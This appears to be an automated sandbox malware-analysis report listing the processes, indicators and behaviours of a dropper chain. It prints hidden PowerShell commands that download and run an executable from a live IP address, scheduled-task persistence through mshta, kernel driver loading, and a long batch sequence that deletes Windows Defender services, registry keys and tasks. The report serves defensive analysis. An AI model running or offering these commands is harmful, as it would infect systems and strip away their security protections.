\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a 978c3aa7bf.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2888 schtasks.exe 1928 schtasks.exe 1660 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1868 11.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 2848 powershell.exe 2848 powershell.exe 2848 powershell.exe 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 320 rapes.exe 540 cUpXaxB.exe 1428 powershell.exe 1428 powershell.exe 1428 powershell.exe 2272 TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE 2116 powershell.exe 1988 powershell.exe 2472 powershell.exe 2948 powershell.exe 2948 powershell.exe 2948 powershell.exe 2828 483d2fa8a0d53818306efeb32d3.exe 1108 fbee3d7922.exe 1108 fbee3d7922.exe 1108 fbee3d7922.exe 1108 fbee3d7922.exe 1108 fbee3d7922.exe 2364 25398cf7b3.exe 2772 503d76e836.exe 2772 503d76e836.exe 1624 d882bd1dca.exe 1624 d882bd1dca.exe 1624 d882bd1dca.exe 3144 978c3aa7bf.exe 3144 978c3aa7bf.exe 3628 cUpXaxB.exe 3644 Organizations.com 3644 Organizations.com 3644 Organizations.com 3644 Organizations.com 3644 Organizations.com 3644 Organizations.com 3644 Organizations.com 3076 cUpXaxB.exe 3076 cUpXaxB.exe 3076 cUpXaxB.exe 3076 cUpXaxB.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 476 Process not Found 476 Process not Found -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 2848 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 1988 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2948 powershell.exe Token: SeDebugPrivilege 3032 taskkill.exe Token: SeDebugPrivilege 2804 taskkill.exe Token: SeDebugPrivilege 2416 taskkill.exe Token: SeDebugPrivilege 728 taskkill.exe Token: SeDebugPrivilege 3068 taskkill.exe Token: SeDebugPrivilege 1388 firefox.exe Token: SeDebugPrivilege 1388 firefox.exe Token: SeDebugPrivilege 1624 d882bd1dca.exe Token: SeDebugPrivilege 1240 tasklist.exe Token: SeDebugPrivilege 3300 tasklist.exe -
Suspicious use of FindShellTrayWindow 25 IoCs
pid Process 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 2440 32a030fbd9.exe 2440 32a030fbd9.exe 2440 32a030fbd9.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 1388 firefox.exe 1388 firefox.exe 1388 firefox.exe 1388 firefox.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 3644 Organizations.com 3644 Organizations.com 3644 Organizations.com -
Suspicious use of SendNotifyMessage 23 IoCs
pid Process 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 2440 32a030fbd9.exe 2440 32a030fbd9.exe 2440 32a030fbd9.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 1388 firefox.exe 1388 firefox.exe 1388 firefox.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 2772 503d76e836.exe 3644 Organizations.com 3644 Organizations.com 3644 Organizations.com -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2568 wrote to memory of 2468 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2568 wrote to memory of 2468 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2568 wrote to memory of 2468 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2568 wrote to memory of 2468 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 30 PID 2568 wrote to memory of 2528 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2568 wrote to memory of 2528 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2568 wrote to memory of 2528 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2568 wrote to memory of 2528 2568 86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe 31 PID 2468 wrote to memory of 2888 2468 cmd.exe 33 PID 2468 wrote to memory of 2888 2468 cmd.exe 33 PID 2468 wrote to memory of 2888 2468 cmd.exe 33 PID 2468 wrote to memory of 2888 2468 cmd.exe 33 PID 2528 wrote to memory of 2848 2528 mshta.exe 34 PID 2528 wrote to memory of 2848 2528 mshta.exe 34 PID 2528 wrote to memory of 2848 2528 mshta.exe 34 PID 2528 wrote to memory of 2848 2528 mshta.exe 34 PID 2848 wrote to memory of 2712 2848 powershell.exe 36 PID 2848 wrote to memory of 2712 2848 powershell.exe 36 PID 2848 wrote to memory of 2712 2848 powershell.exe 36 PID 2848 wrote to memory of 2712 2848 powershell.exe 36 PID 2712 wrote to memory of 320 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 37 PID 2712 wrote to memory of 320 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 37 PID 2712 wrote to memory of 320 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 37 PID 2712 wrote to memory of 320 2712 TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE 37 PID 320 wrote to memory of 540 320 rapes.exe 39 PID 320 wrote to memory of 540 320 rapes.exe 39 PID 320 wrote to memory of 540 320 rapes.exe 39 PID 320 wrote to memory of 540 320 rapes.exe 39 PID 320 wrote to memory of 2664 320 rapes.exe 40 PID 320 wrote to memory of 2664 320 rapes.exe 40 PID 320 wrote to memory of 2664 320 rapes.exe 40 PID 320 wrote to memory of 2664 320 rapes.exe 40 PID 2664 wrote to memory of 2244 2664 apple.exe 42 PID 2664 wrote to memory of 2244 2664 apple.exe 42 PID 2664 wrote to memory of 2244 2664 apple.exe 42 PID 2664 wrote to memory of 2244 2664 apple.exe 42 PID 2244 wrote to memory of 2588 2244 11.exe 43 PID 2244 wrote to memory of 2588 2244 11.exe 43 PID 2244 wrote to memory of 2588 2244 11.exe 43 PID 2244 wrote to memory of 2588 2244 11.exe 43 PID 2588 wrote to memory of 1868 2588 cmd.exe 45 PID 2588 wrote to memory of 1868 2588 cmd.exe 45 PID 2588 wrote to memory of 1868 2588 cmd.exe 45 PID 2588 wrote to memory of 1868 2588 cmd.exe 45 PID 1868 wrote to memory of 976 1868 11.exe 46 PID 1868 wrote to memory of 976 1868 11.exe 46 PID 1868 wrote to memory of 976 1868 11.exe 46 PID 1868 wrote to memory of 976 1868 11.exe 46 PID 976 wrote to memory of 1452 976 cmd.exe 48 PID 976 wrote to memory of 1452 976 cmd.exe 48 PID 976 wrote to memory of 1452 976 cmd.exe 48 PID 976 wrote to memory of 2072 976 cmd.exe 49 PID 976 wrote to memory of 2072 976 cmd.exe 49 PID 976 wrote to memory of 2072 976 cmd.exe 49 PID 976 wrote to memory of 1644 976 cmd.exe 50 PID 976 wrote to memory of 1644 976 cmd.exe 50 PID 976 wrote to memory of 1644 976 cmd.exe 50 PID 976 wrote to memory of 1488 976 cmd.exe 51 PID 976 wrote to memory of 1488 976 cmd.exe 51 PID 976 wrote to memory of 1488 976 cmd.exe 51 PID 976 wrote to memory of 1724 976 cmd.exe 52 PID 976 wrote to memory of 1724 976 cmd.exe 52 PID 976 wrote to memory of 1724 976 cmd.exe 52 PID 976 wrote to memory of 1268 976 cmd.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"C:\Users\Admin\AppData\Local\Temp\86fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 7etKomaiMKA /tr "mshta C:\Users\Admin\AppData\Local\Temp\9BABvKunJ.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 7etKomaiMKA /tr "mshta C:\Users\Admin\AppData\Local\Temp\9BABvKunJ.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2888
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\9BABvKunJ.hta3⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2848 -
C:\Users\Admin\AppData\Local\TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE"C:\Users\Admin\AppData\Local\TempYEVPQVNGORICJML5CO5PJXDWHCZW72LC.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:540
-
-
C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CBC7.tmp\CBC8.tmp\CBC9.bat C:\Users\Admin\AppData\Local\Temp\11.exe"9⤵
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CC15.tmp\CC16.tmp\CC17.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"11⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"12⤵
- Launches sc.exe
PID:1452
-
-
C:\Windows\system32\sc.exesc start ddrver12⤵
- Launches sc.exe
PID:2072
-
-
C:\Windows\system32\timeout.exetimeout /t 112⤵
- Delays execution with timeout.exe
PID:1644
-
-
C:\Windows\system32\sc.exesc stop ddrver12⤵
- Launches sc.exe
PID:1488
-
-
C:\Windows\system32\sc.exesc start ddrver12⤵
- Launches sc.exe
PID:1724
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y12⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1268
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t12⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1588
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"12⤵
- Launches sc.exe
PID:1604
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"12⤵
- Launches sc.exe
PID:1600
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f12⤵PID:924
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"12⤵
- Launches sc.exe
PID:972
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"12⤵
- Launches sc.exe
PID:896
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f12⤵PID:1028
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"12⤵
- Launches sc.exe
PID:2020
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"12⤵
- Launches sc.exe
PID:2116
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f12⤵PID:2424
-
-
C:\Windows\system32\sc.exesc stop "Sense"12⤵
- Launches sc.exe
PID:3060
-
-
C:\Windows\system32\sc.exesc delete "Sense"12⤵
- Launches sc.exe
PID:1884
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f12⤵PID:2076
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"12⤵
- Launches sc.exe
PID:1716
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"12⤵
- Launches sc.exe
PID:2628
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f12⤵PID:2428
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"12⤵
- Launches sc.exe
PID:324
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"12⤵
- Launches sc.exe
PID:1952
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f12⤵PID:988
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"12⤵
- Launches sc.exe
PID:2364
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"12⤵
- Launches sc.exe
PID:2592
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f12⤵PID:1764
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"12⤵
- Launches sc.exe
PID:1756
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"12⤵
- Launches sc.exe
PID:912
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f12⤵PID:2216
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"12⤵
- Launches sc.exe
PID:1696
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"12⤵
- Launches sc.exe
PID:1624
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f12⤵PID:1524
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"12⤵
- Launches sc.exe
PID:1552
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"12⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f12⤵PID:2108
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"12⤵
- Launches sc.exe
PID:2568
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"12⤵
- Launches sc.exe
PID:2936
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f12⤵PID:2800
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"12⤵
- Launches sc.exe
PID:2964
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"12⤵
- Launches sc.exe
PID:2812
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f12⤵PID:2912
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"12⤵
- Launches sc.exe
PID:3064
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"12⤵
- Launches sc.exe
PID:2896
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f12⤵PID:2836
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"12⤵
- Launches sc.exe
PID:2468
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"12⤵
- Launches sc.exe
PID:2984
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f12⤵PID:2724
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"12⤵
- Launches sc.exe
PID:2708
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"12⤵
- Launches sc.exe
PID:2688
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f12⤵PID:3040
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"12⤵
- Launches sc.exe
PID:2268
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"12⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f12⤵PID:2772
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f12⤵PID:2864
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f12⤵PID:2192
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f12⤵PID:2236
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f12⤵PID:2848
-
-
C:\Windows\system32\sc.exesc stop ddrver12⤵
- Launches sc.exe
PID:2388
-
-
C:\Windows\system32\sc.exesc delete ddrver12⤵
- Launches sc.exe
PID:2160
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"7⤵
- Executes dropped EXE
PID:2712
-
-
C:\Users\Admin\AppData\Local\Temp\10318740101\32a030fbd9.exe"C:\Users\Admin\AppData\Local\Temp\10318740101\32a030fbd9.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2440 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 1wyiymawuEj /tr "mshta C:\Users\Admin\AppData\Local\Temp\fo1ipiSC0.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
PID:1576 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 1wyiymawuEj /tr "mshta C:\Users\Admin\AppData\Local\Temp\fo1ipiSC0.hta" /sc minute /mo 25 /ru "Admin" /f9⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1928
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\fo1ipiSC0.hta8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:1912 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428 -
C:\Users\Admin\AppData\Local\TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE"C:\Users\Admin\AppData\Local\TempXQEYYAECNHFBOUUM2CFKXY39DBWQP7SR.EXE"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\10318750121\am_no.cmd" "7⤵
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:1644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2252 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:2428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:1756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "vTCc9magjy6" /tr "mshta \"C:\Temp\oHx9BTVOj.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1660
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\oHx9BTVOj.hta"8⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
PID:2824 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2948 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2828
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"C:\Users\Admin\AppData\Local\Temp\10318860101\QL4t9UZ.exe"7⤵
- Executes dropped EXE
PID:2088
-
-
C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe"C:\Users\Admin\AppData\Local\Temp\10318980101\laf6w_001.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1596
-
-
